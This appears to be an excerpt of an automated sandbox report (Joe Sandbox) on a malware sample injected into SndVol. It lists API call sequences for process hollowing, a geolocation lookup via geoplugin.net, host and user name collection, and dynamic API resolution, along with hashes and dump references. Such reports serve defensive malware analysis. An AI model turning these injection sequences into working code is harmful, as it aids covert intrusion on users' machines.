47->48 48->9 49->35
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                                                                • NtClose.NTDLL(?), ref: 004182F7
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                • ResumeThread.KERNEL32(?), ref: 00418435
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                • NtClose.NTDLL(?), ref: 00418468
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                • GetLastError.KERNEL32 ref: 0041847A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                • API String ID: 3150337530-3035715614
                                                                • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1540 1e6c10f1-1e6c1166 call 1e6c2c40 * 2 lstrlenW call 1e6c2c40 lstrcatW lstrlenW 1547 1e6c1168-1e6c1172 lstrlenW 1540->1547 1548 1e6c1177-1e6c119e lstrlenW FindFirstFileW 1540->1548 1547->1548 1549 1e6c11a0-1e6c11a8 1548->1549 1550 1e6c11e1-1e6c11e9 1548->1550 1551 1e6c11aa-1e6c11c4 call 1e6c1000 1549->1551 1552 1e6c11c7-1e6c11d8 FindNextFileW 1549->1552 1551->1552 1552->1549 1554 1e6c11da-1e6c11db FindClose 1552->1554 1554->1550
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1E6C1137
                                                                • lstrcatW.KERNEL32(?,?), ref: 1E6C1151
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C115C
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C116D
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C117C
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C1193
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1E6C11D0
                                                                • FindClose.KERNEL32(00000000), ref: 1E6C11DB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true
                                                                • Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                • String ID:
                                                                • API String ID: 1083526818-0
                                                                • Opcode ID: 5e4c8985af701ec14ce36a387aa744eb6fc187f82971ee267744b73ab2aebcc7
                                                                • Instruction ID: 226cc7d71e4c9ee25880edf2861da4ad2fcb395ceece4f7c94fa01b9bbbb2966
                                                                • Opcode Fuzzy Hash: 5e4c8985af701ec14ce36a387aa744eb6fc187f82971ee267744b73ab2aebcc7
                                                                • Instruction Fuzzy Hash: 5A216171644358ABD710EE649C4CF9B7BECEF84714F400E2AF958D3190EB74E6058796

                                                                Control-flow Graph

                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                • Opcode ID: 141df06f7ff4380f714519ca4b37ae7b5b729db64280299abff6e316310e0a66
                                                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                • Opcode Fuzzy Hash: 141df06f7ff4380f714519ca4b37ae7b5b729db64280299abff6e316310e0a66
                                                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1615 411cfe-411d1e call 41179c 1618 411d20-411d22 1615->1618 1619 411d27-411d30 1615->1619 1620 411f3a-411f40 1618->1620 1621 411d32-411d3d SetLastError 1619->1621 1622 411d3f-411d51 call 41179c 1619->1622 1621->1618 1622->1618 1625 411d53-411d5e 1622->1625 1625->1621 1626 411d60-411d69 1625->1626 1626->1621 1627 411d6b-411d6f 1626->1627 1627->1621 1628 411d71-411d7b 1627->1628 1629 411d7d-411d80 1628->1629 1630 411d9f-411dc2 GetNativeSystemInfo call 41178b * 2 1628->1630 1632 411d82-411d88 1629->1632 1639 411dd4-411dee call 411ca3 1630->1639 1640 411dc4 1630->1640 1633 411d8a-411d8d 1632->1633 1634 411d8f 1632->1634 1636 411d92-411d9d 1633->1636 1634->1636 1636->1630 1636->1632 1646 411df0-411e06 call 411ca3 1639->1646 1647 411e0c-411e21 GetProcessHeap HeapAlloc 1639->1647 1641 411dc9-411dcf SetLastError 1640->1641 1643 411f37 1641->1643 1645 411f39 1643->1645 1645->1620 1646->1647 1654 411e08-411e0a 1646->1654 1648 411e23-411e33 call 411cba 1647->1648 1649 411e35-411e80 call 41179c 1647->1649 1648->1654 1657 411f30-411f32 call 412077 1649->1657 1658 411e86-411ec8 call 411ca3 call 436910 call 4117af 1649->1658 1654->1641 1657->1643 1658->1657 1666 411eca-411ed2 1658->1666 1667 411ee3-411ee6 1666->1667 1668 411ed4-411ee1 call 411ab3 1666->1668 1670 411ee9-411ef2 call 411b5f 1667->1670 1668->1670 1670->1657 1674 411ef4-411ef6 call 41194f 1670->1674 1676 411efb-411efd 1674->1676 1676->1657 1677 411eff-411f08 call 411a82 1676->1677 1677->1657 1680 411f0a-411f11 1677->1680 1681 411f13-411f19 1680->1681 1682 411f4b 1680->1682 1684 411f46-411f49 1681->1684 1685 411f1b-411f23 1681->1685 1683 411f4f-411f51 1682->1683 1683->1645 1684->1683 1687 411f41-411f44 1685->1687 1688 411f25-411f2a SetLastError 1685->1688 1687->1683 1688->1657
                                                                APIs
                                                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                APIs
                                                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: 4.9.4 Pro$override$pth_unenc
                                                                • API String ID: 2281282204-930821335
                                                                • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 0535130F
                                                                • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 05351466
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLibraryLoadVirtual
                                                                • String ID:
                                                                • API String ID: 3550616410-0
                                                                • Opcode ID: 7e17c64fc21983895fcf5bd993b9c76f24004772564de837fe521de7ce446b14
                                                                • Instruction ID: 52cb223b810774f14487135d324561d51a0404e9d858f0ee0a8df2e35fc7fc1a
                                                                • Opcode Fuzzy Hash: 7e17c64fc21983895fcf5bd993b9c76f24004772564de837fe521de7ce446b14
                                                                • Instruction Fuzzy Hash: 64D1D571A00205AFDB18CF69CC94FAEB7B6FF84320F199159ED46AB695DB70E900CB50
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                • API String ID: 4236061018-3687161714
                                                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 51 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 68 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 51->68 69 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 51->69 115 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 68->115 116 40ebae-40ebc9 call 401e65 call 40b9bd 68->116 95 40eef2-40ef03 call 401fd8 69->95 115->116 146 40f34f-40f36a call 401fab call 4139a9 call 412475 115->146 125 40ec03-40ec0a call 40d069 116->125 126 40ebcb-40ebea call 401fab call 413549 116->126 135 40ec13-40ec1a 125->135 136 40ec0c-40ec0e 125->136 126->125 145 40ebec-40ec02 call 401fab call 4139a9 126->145 140 40ec1c 135->140 141 40ec1e-40ec2a call 41b2c3 135->141 139 40eef1 136->139 139->95 140->141 151 40ec33-40ec37 141->151 152 40ec2c-40ec2e 141->152 145->125 172 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 146->172 154 40ec76-40ec89 call 401e65 call 401fab 151->154 155 40ec39 call 407716 151->155 152->151 173 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 154->173 174 40ec8b call 407755 154->174 163 40ec3e-40ec40 155->163 166 40ec42-40ec47 call 407738 call 407260 163->166 167 40ec4c-40ec5f call 401e65 call 401fab 163->167 166->167 167->154 187 40ec61-40ec67 167->187 203 40f3a5-40f3af call 40dd42 call 414f2a 172->203 223 40ed80-40ed84 173->223 224 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 173->224 174->173 187->154 190 40ec69-40ec6f 187->190 190->154 194 40ec71 call 407260 190->194 194->154 226 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 223->226 227 40ed8a-40ed91 223->227 224->223 250 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 224->250 280 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 226->280 229 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 227->229 230 40ee0f-40ee19 call 409057 227->230 236 40ee1e-40ee42 call 40247c call 434798 229->236 230->236 258 40ee51 236->258 259 40ee44-40ee4f call 436e90 236->259 250->223 264 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 258->264 259->264 318 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 264->318 333 40efc1 280->333 334 40efdc-40efde 280->334 318->280 332 40eece-40eeed call 401e65 call 41bc5e call 40f474 318->332 332->280 352 40eeef 332->352 336 40efc3-40efda call 41cd9b CreateThread 333->336 337 40efe0-40efe2 334->337 338 40efe4 334->338 339 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 336->339 337->336 338->339 390 40f101 339->390 391 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 339->391 352->139 392 40f103-40f11b call 401e65 call 401fab 390->392 391->392 403 40f159-40f16c call 401e65 call 401fab 392->403 404 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 392->404 413 40f1cc-40f1df call 401e65 call 401fab 403->413 414 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 403->414 404->403 425 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 413->425 426 40f21a-40f23e call 41b60d call 401f13 call 401f09 413->426 414->413 425->426 448 40f240-40f241 SetProcessDEPPolicy 426->448 449 40f243-40f256 CreateThread 426->449 448->449 452 40f264-40f26b 449->452 453 40f258-40f262 CreateThread 449->453 454 40f279-40f280 452->454 455 40f26d-40f277 CreateThread 452->455 453->452 458 40f282-40f285 454->458 459 40f28e 454->459 455->454 461 40f287-40f28c 458->461 462 40f2cc-40f2df call 401fab call 4134ff 458->462 464 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 459->464 461->464 471 40f2e4-40f2e7 462->471 464->462 471->203 473 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 471->473 489 40f346-40f34b DeleteFileW 473->489 490 40f34d 489->490 491 40f32f-40f332 489->491 490->172 491->172 492 40f334-40f341 Sleep call 401f04 491->492 492->489
                                                                APIs
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
